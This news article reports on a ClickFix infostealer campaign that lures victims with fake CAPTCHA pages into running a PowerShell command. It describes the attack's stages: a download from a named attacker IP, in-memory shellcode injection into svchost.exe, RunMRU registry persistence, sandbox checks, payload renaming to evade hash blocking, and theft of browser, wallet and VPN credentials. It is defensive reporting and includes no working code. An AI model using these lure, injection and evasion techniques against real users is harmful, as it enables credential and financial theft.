ClickFix Infostealer Campaign Uses Fake CAPTCHA Lures to Compromise Victims

In Cybersecurity News - Original News Source is cybersecuritynews.com by Blog Writer

A sophisticated new malware campaign has emerged, leveraging fake CAPTCHA lures to deceive users and deploy a stealthy information stealer.

Identified in early 2026, this activity shares significant behavioral patterns with the ClickFix campaign that previously targeted restaurant reservation systems in July 2025.

The operators have refined their social engineering tactics to bypass traditional security controls effectively and gain initial access to victim systems.

The attack initiates when a user visits a compromised website displaying a deceptive CAPTCHA verification page.

This page tricks the victim into copying a malicious PowerShell command to their clipboard and executing it manually.

This “ClickFix” technique exploits human interaction to evade automated security sandboxes that typically analyze file downloads rather than manual command execution.

Clipboard data (Source – Cyber Proof)

The command initiates a download from the attacker’s infrastructure, specifically the IP 91.92.240.219. The malware reads the clipboard via specific API calls to verify the user’s action before proceeding.

Once executed, the malicious script begins a multi-stage infection process designed to steal sensitive data.

The malware targets a wide range of applications, including over twenty-five web browsers, cryptocurrency wallets like MetaMask, and enterprise VPN configurations. 

Cyber Proof analysts noted that the campaign checks for virtual environments and active security tools before exfiltration.

The impact is severe, granting attackers access to critical credentials and financial assets, allowing them to monetize compromised accounts or pivot deeper into corporate networks.

Process Injection and Persistence

The malware employs advanced process injection to maintain stealth on infected devices. After the initial PowerShell execution, it downloads a position-independent shellcode file named cptch.bin from the attacker’s infrastructure.

Analysts also observed an operational security error where the attacker used the variable $finalPayload, which was flagged by Microsoft Defender. Generated using the Donut framework, this allows the payload to execute directly in memory.

Loading of cptch.bin (Source – Cyber Proof)

HHere the shellcode allocates memory within benign processes like svchost.exe using standard Windows APIs such as VirtualAlloc to hide its malicious activity.

To ensure the infection survives reboots, the attackers modify the RunMRU registry key. This modification forces the machine to re-execute the malicious PowerShell command upon startup, re-initiating the payload download.

Persistence through RUNMRU key (Source – Cyber Proof)

This persistence mechanism ensures long-term access. Additionally, the actors rotate payload filenames, such as cptchbuild.bin, to bypass hash-based blocking mechanisms.

Organizations should educate users about the risks of running commands from web pages. Security teams must monitor for unusual PowerShell execution and specific registry modifications.

Implementing endpoint detection rules that flag clipboard data reading by browser processes can help identify this attack early.

Follow us on Google News, LinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.